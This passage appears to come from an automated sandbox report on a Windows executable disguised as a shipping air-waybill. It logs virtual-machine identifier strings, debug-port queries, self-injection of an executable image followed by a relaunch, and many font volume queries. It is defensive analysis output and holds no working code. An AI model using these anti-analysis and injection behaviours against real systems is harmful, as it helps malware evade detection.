                        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,3_2_00402B7C
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory written: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
